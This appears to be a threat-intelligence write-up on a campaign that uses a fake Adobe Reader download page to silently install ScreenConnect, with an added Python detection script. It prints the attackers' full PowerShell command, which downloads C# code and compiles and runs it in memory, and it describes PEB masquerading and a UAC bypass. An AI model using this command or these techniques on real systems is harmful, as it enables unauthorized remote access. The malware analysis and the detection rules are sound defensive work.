In February 2026, researchers observed an attack that begins with a fake download page impersonating Adobe Acrobat Reader. Victims are tricked into downloading a malicious script disguised as an installer.
The ultimate goal? Deploy ScreenConnect, a legitimate remote monitoring and management (RMM) tool, for unauthorized access.
What makes this campaign dangerous is not just the payload but the stealthy delivery and execution techniques used throughout.

Stage 1: The Deceptive Lure
The attack begins with a fake website mimicking Adobe’s official download page. Once a victim visits the page:
- A file named Acrobat_Reader_V112_6971.vbs is automatically downloaded
- The file is heavily obfuscated
- It acts as the initial loader for the attack chain
This social engineering tactic leverages user trust in widely used software, increasing the likelihood of execution.
Stage 2: Obfuscated VBScript Loader
The downloaded VBScript is designed to evade detection and analysis:
- Uses dynamic string reconstruction via Replace() functions
- Avoids cleartext references like WScript.Shell
- Builds commands using Chr() with arithmetic expressions
- Executes the payload silently in the background
This level of obfuscation makes static analysis extremely difficult, especially for traditional antivirus engines.
Stage 3: PowerShell as a Staging Mechanism
The VBScript launches a PowerShell command with execution policy bypass:
- Creates a temporary directory
- Downloads a file from Google Drive
- Reads the file into memory
- Compiles it using Add-Type
This “fileless” approach significantly reduces forensic artifacts and bypasses signature-based detection. The observed command line:
powershell.exe -ExecutionPolicy Bypass -command ""New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; curl.exe -L 'https://drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download' -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()""
Stage 4: In-Memory .NET Execution
The downloaded content contains C# code that:
- Embeds a malicious .NET assembly inside a byte array
- Uses reflection (Assembly.Load) to execute it
- Dynamically reconstructs method names, for example "Lo"+"ad" instead of "Load" and "Ent"+"ryPo"+"int" instead of "EntryPoint"
This prevents pattern-based detection and frustrates reverse engineering.

Stage 5: Advanced Evasion Techniques
1. PEB Manipulation (Process Masquerading)
The malware modifies the Process Environment Block (PEB) to:
- Change process name and path
- Masquerade as legitimate Windows binaries (e.g., winhlp32.exe)
This allows it to blend into normal system activity and evade EDR tools.
2. Native API Usage
Instead of standard APIs like VirtualAlloc, it uses NtAllocateVirtualMemory from ntdll.dll.
Why this matters:
- Reduces exposure to user-mode hooks
- Avoids security monitoring triggers
3. Shellcode Injection
- Allocates executable memory
- Injects shellcode
- Executes it to retrieve system structures like the PEB
This is a classic low-level evasion technique adapted for modern attacks.
Stage 6: UAC Bypass via COM Objects
The attack abuses Windows’ auto-elevated COM objects:
- Constructs a reversed elevation moniker
- Uses CoGetObject to request elevated privileges
- Gains admin-level execution without user prompts
This bypasses User Account Control (UAC) silently—one of the most dangerous aspects of the chain.
Stage 7: Final Payload – ScreenConnect Deployment
In the final stage:
- A PowerShell command downloads a .msi installer
- Executes it using msiexec
- Installs ScreenConnect silently
Once installed, attackers gain:
- Persistent remote access
- Full system control
- Ability to move laterally or deploy additional malware
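As an added example of detection logic for the Stage 3 staging command and the Stage 7 msiexec install (editor-written, not part of the original report), the Python below evaluates process-creation records against rules derived from the behaviours described: a script host spawning PowerShell, -ExecutionPolicy Bypass, a downloader writing into C:\Windows\Temp, Add-Type -TypeDefinition, and msiexec quietly installing from a URL. The Key=Value|Key=Value record format, the sample records and their URLs are assumptions constructed for the demo.

```python
import re

def _base(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()

# Each rule: (name, predicate over the parsed event); order is the reporting order.
RULES = [
    ("script_host_spawns_powershell",
     lambda e: _base(e["ParentImage"]) in ("wscript.exe", "cscript.exe")
               and _base(e["Image"]) == "powershell.exe"),
    ("execution_policy_bypass",
     lambda e: re.search(r"-(?:executionpolicy|ep)\s+bypass", e["CommandLine"], re.I)),
    ("downloader_to_windows_temp",
     lambda e: re.search(r"(curl\.exe|invoke-webrequest|\biwr\b|downloadfile|downloadstring).*c:\\windows\\temp",
                         e["CommandLine"], re.I)),
    ("in_memory_csharp_compile",
     lambda e: re.search(r"add-type\b.*-typedefinition", e["CommandLine"], re.I)),
    ("msiexec_remote_quiet_install",
     lambda e: _base(e["Image"]) == "msiexec.exe"
               and re.search(r"/i\s+https?://\S+\s+/q", e["CommandLine"], re.I)),
]

def parse_event(line):
    """Parse a constructed 'Key=Value|Key=Value' process-creation record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def evaluate(line):
    """Names of the rules a single process-creation record matches."""
    e = parse_event(line)
    return [name for name, pred in RULES if pred(e)]

def triage(lines, min_hits=1):
    """Indices of records matching at least min_hits rules (raise min_hits to cut noise)."""
    return [i for i, line in enumerate(lines) if len(evaluate(line)) >= min_hits]

# Constructed process-creation records (Sysmon Event ID 1 style), not real telemetry.
# URLs and paths are placeholders, not the campaign's indicators.
LOGS = [
    r"ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r'|CommandLine=powershell.exe -ExecutionPolicy Bypass -command "curl.exe -L https://drive.example/uc?id=PLACEHOLDER -o C:\Windows\Temp\FileR.txt; Add-Type -TypeDefinition $source -Language CSharp"',
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    r"ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|Image=C:\Windows\System32\msiexec.exe"
    r"|CommandLine=msiexec.exe /i https://files.example/installer.msi /qn",
]
```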

Indicators Of Compromise (IOCs)
Our Opinion on This Case
This attack chain highlights a growing and concerning trend in cybersecurity: the weaponization of legitimate tools combined with advanced in-memory execution techniques. Instead of relying on traditional malware binaries, attackers are increasingly leveraging trusted software like ScreenConnect to blend into enterprise environments. This makes detection significantly harder, especially for organizations that rely heavily on allowlists or trust-based execution policies.
What stands out most is the layered evasion strategy. From VBScript obfuscation to .NET reflection and PEB manipulation, every stage is designed to reduce visibility. This indicates a high level of sophistication and planning. It is no longer enough to rely on antivirus solutions alone—behavioral detection and memory analysis are becoming essential.
Additionally, the abuse of auto-elevated COM objects to bypass UAC without user interaction is particularly alarming. It shows how attackers are exploiting legitimate Windows features rather than vulnerabilities, making patch-based defenses less effective.
In our view, organizations must shift toward a zero-trust mindset. Monitoring PowerShell activity, restricting script execution, and implementing EDR solutions with strong behavioral analytics are critical. User awareness also remains vital—because even the most advanced attack still begins with a simple click on a fake download.
